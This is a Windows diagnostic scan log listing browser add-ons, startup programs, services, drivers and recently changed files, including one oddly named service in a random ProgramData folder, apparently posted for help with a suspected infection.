BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
uRun: [OneDrive] "C:\Users\P\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [LWS] C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
StartupFolder: C:\Users\P\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\SENDTO~1.LNK - C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{0ceec13f-8aee-485f-8962-e532f6151bfd} : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office15\OCHelper.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office15\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office15\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\P\AppData\Roaming\Mozilla\Firefox\Profiles\4e2aqbwn.default\
FF - prefs.js: browser.startup.homepage - Google
FF - plugin: C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
============= SERVICES / DRIVERS ===============
.
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-15 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2015-7-16 256992]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2015-7-15 344064]
R2 AODDriver4.2;AODDriver4.2;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2015-8-17 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-8-17 1133880]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R2 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
R3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-23 21160]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2015-5-28 102912]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\WINDOWS\System32\drivers\LEqdUsb.sys [2014-3-19 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\WINDOWS\System32\drivers\LHidEqd.sys [2014-3-19 13080]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
R3 LVRS64;Logitech RightSound Filter Driver;C:\WINDOWS\System32\drivers\lvrs64.sys [2015-8-20 351520]
R3 LVUVC64;@oem30.inf,%PID_0825_DD%(UVC);Logitech HD Webcam C270(UVC);C:\WINDOWS\System32\drivers\lvuvc64.sys [2015-8-20 4758176]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2015-8-17 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2015-8-17 113880]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-8-17 64216]
R3 MBfilt;MBfilt;C:\WINDOWS\System32\drivers\MBfilt64.sys [2015-2-12 32344]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2015-7-10 587264]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2015-7-10 362928]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2015-7-10 24576]
S2 AODDriver4.2.0;AODDriver4.2.0;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-7-20 134512]
S2 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2015-7-10 39856]
S2 NvVCagdefcZ;NvVCagdefcZ;"C:\ProgramData\eAEyagDyd\NvVCagdefcZ.exe" --> C:\ProgramData\eAEyagDyd\NvVCagdefcZ.exe [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-7-9 327296]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-7-20 134512]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 embeddedmode;embeddedmode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\WINDOWS\System32\ieetwcollector.exe [2015-7-10 115200]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 IoQos;IoQos;C:\WINDOWS\System32\drivers\ioqos.sys [2015-7-10 26624]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\lsass.exe [2015-7-10 56344]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2014-1-23 178760]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-8-15 934752]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2015-8-15 1031680]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2015-7-10 39856]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-19 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-8-15 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 vmicvmsession;Hyper-V VM Session Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-15 685568]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2015-7-10 39856]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 WpnService;Windows Push Notifications Service;C:\WINDOWS\System32\svchost.exe -k wswpnservice [2015-7-10 39856]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
.
=============== Created Last 30 ================
.
2015-09-17 02:24:14 16148 ----a-w- C:\WINDOWS\System32\PRAMOD_P_HistoryPrediction.bin
2015-09-17 02:21:24 -------- d-----w- C:\AdwCleaner
2015-09-16 23:55:54 -------- d-----w- C:\Program Files (x86)\e37e9aee-d8fe-4bd9-a4f8-da390760871d
2015-09-16 23:52:24 -------- d-----w- C:\WINDOWS\System32\tafi
2015-09-16 23:52:21 -------- d-----w- C:\Users\P\AppData\Local\Tempfolder
2015-09-16 23:52:06 -------- d-----w- C:\Users\P\AppData\Local\Installer
2015-09-16 23:42:23 -------- d-----w- C:\Users\P\AppData\Local\Opera Software
2015-09-16 23:42:22 -------- d-----w- C:\Users\P\AppData\Roaming\Opera Software
2015-09-16 23:37:01 11062400 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{84FD077C-67A8-496E-B6FF-AF99506EE0E7}\mpengine.dll
2015-09-15 07:48:34 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2015-09-14 05:47:20 -------- d-----w- C:\Users\P\AppData\Roaming\Anvsoft
2015-09-14 05:47:12 -------- d-----w- C:\Program Files (x86)\Anvsoft
2015-09-09 08:33:22 -------- d-----w- C:\WINDOWS\PCHEALTH
2015-09-04 00:19:36 1190000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{12CCC164-86D5-4B2E-A076-A0276829540E}\gapaengine.dll
2015-08-30 23:26:22 113880 ----a-w- C:\WINDOWS\System32\drivers\3DA32461.sys
2015-08-23 04:17:02 -------- d-----w- C:\Program Files\CPUID
2015-08-22 05:20:59 89520 ----a-w- C:\WINDOWS\System32\atimpc64.dll
2015-08-20 03:04:41 -------- d-----w- C:\Users\P\Tracing
2015-08-20 03:04:02 -------- d-----w- C:\Users\P\AppData\Local\Logitech® Webcam Software
2015-08-20 02:59:59 40398 ----a-w- C:\WINDOWS\System32\Repository.reg
2015-08-20 02:59:58 351520 ----a-w- C:\WINDOWS\System32\drivers\lvrs64.sys
2015-08-20 02:59:58 262432 ----a-w- C:\WINDOWS\System32\lvco1380853.dll
2015-08-20 02:58:28 -------- d-----w- C:\Users\P\AppData\Local\Skype
2015-08-20 02:57:54 -------- d-----r- C:\Program Files (x86)\Skype
2015-08-19 11:52:12 26851520 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSO.DLL
2015-08-19 11:45:32 654520 ----a-w- C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSOSQM.EXE
2015-08-19 11:45:32 37402720 ----a-w- C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL
2015-08-19 07:49:59 5454848 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
.
==================== Find3M ====================
.
2015-09-17 02:24:17 113880 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2015-09-02 01:20:52 77400 ----a-w- C:\WINDOWS\System32\acmigration.dll
2015-09-02 00:25:58 3586560 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2015-09-02 00:25:34 1382912 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2015-08-27 06:32:24 608936 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2015-08-27 06:04:18 21874688 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-27 05:54:40 365568 ----a-w- C:\WINDOWS\System32\atmfd.dll
2015-08-27 05:54:26 541248 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2015-08-27 05:51:48 1774592 ----a-w- C:\WINDOWS\System32\Windows.UI.Immersive.dll
2015-08-27 05:51:42 2350592 ----a-w- C:\WINDOWS\System32\authui.dll
2015-08-27 05:49:28 1008640 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2015-08-27 05:43:31 576000 ----a-w- C:\WINDOWS\System32\vbscript.dll
2015-08-27 05:42:52 187904 ----a-w- C:\WINDOWS\System32\Windows.UI.PicturePassword.dll
2015-08-27 05:42:46 596480 ----a-w- C:\WINDOWS\System32\SettingSync.dll
2015-08-27 05:42:36 184320 ----a-w- C:\WINDOWS\System32\shacct.dll
2015-08-27 05:42:25 578560 ----a-w- C:\WINDOWS\System32\winlogon.exe
2015-08-27 05:39:42 45568 ----a-w- C:\WINDOWS\System32\atmlib.dll
2015-08-27 05:23:43 303104 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2015-08-27 05:16:41 1612288 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Immersive.dll
2015-08-27 05:16:38 2153472 ----a-w- C:\WINDOWS\SysWow64\authui.dll
2015-08-27 05:16:03 18806272 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-27 05:12:35 504320 ----a-w- C:\WINDOWS\SysWow64\vbscript.dll
2015-08-27 05:11:54 484352 ----a-w- C:\WINDOWS\SysWow64\SettingSync.dll
2015-08-27 05:11:39 139776 ----a-w- C:\WINDOWS\SysWow64\shacct.dll
2015-08-27 05:08:18 37376 ----a-w- C:\WINDOWS\SysWow64\atmlib.dll
2015-08-22 05:20:59 85472 ----a-w- C:\WINDOWS\System32\atig6pxx.dll
2015-08-20 06:07:55 8019296 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-20 06:06:53 609592 ----a-w- C:\WINDOWS\System32\ci.dll
2015-08-20 05:26:23 168960 ----a-w- C:\WINDOWS\System32\InstallAgent.exe
2015-08-20 05:21:13 193024 ----a-w- C:\WINDOWS\System32\EnterpriseModernAppMgmtCSP.dll
2015-08-18 07:56:25 2498808 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2015-08-18 07:55:45 373072 ----a-w- C:\WINDOWS\System32\drivers\USBXHCI.SYS
2015-08-18 07:54:30 1396064 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2015-08-18 07:27:23 1771592 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2015-08-18 07:24:35 963920 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2015-08-18 07:13:10 497664 ----a-w- C:\WINDOWS\System32\WlanMediaManager.dll
2015-08-18 07:13:06 387584 ----a-w- C:\WINDOWS\System32\NetSetupShim.dll
2015-08-18 07:12:20 692224 ----a-w- C:\WINDOWS\System32\drivers\UMDF\NfcCx.dll
2015-08-18 07:12:18 2225664 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-18 07:07:34 2226688 ----a-w- C:\WINDOWS\System32\wlansvc.dll
2015-08-18 07:04:20 859136 ----a-w- C:\WINDOWS\System32\modernexecserver.dll
2015-08-18 07:04:14 1234944 ----a-w- C:\WINDOWS\System32\aitstatic.exe
2015-08-18 06:59:35 1294336 ----a-w- C:\WINDOWS\System32\wcnwiz.dll
2015-08-18 06:59:02 140288 ----a-w- C:\WINDOWS\System32\WcnApi.dll
2015-08-18 06:58:46 50176 ----a-w- C:\WINDOWS\System32\WcnNetsh.dll
2015-08-18 06:58:34 112640 ----a-w- C:\WINDOWS\System32\fdWCN.dll
2015-08-18 06:58:31 117760 ----a-w- C:\WINDOWS\System32\dafWCN.dll
2015-08-18 06:58:25 187392 ----a-w- C:\WINDOWS\System32\NetSetupSvc.dll
2015-08-18 06:57:54 45568 ----a-w- C:\WINDOWS\System32\wfdprov.dll
2015-08-18 06:56:48 79872 ----a-w- C:\WINDOWS\System32\BthRadioMedia.dll
2015-08-18 06:55:01 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-18 06:54:11 247296 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2015-08-18 06:54:03 322048 ----a-w- C:\WINDOWS\System32\vaultsvc.dll
2015-08-18 06:52:26 1888768 ----a-w- C:\WINDOWS\System32\dwmcore.dll
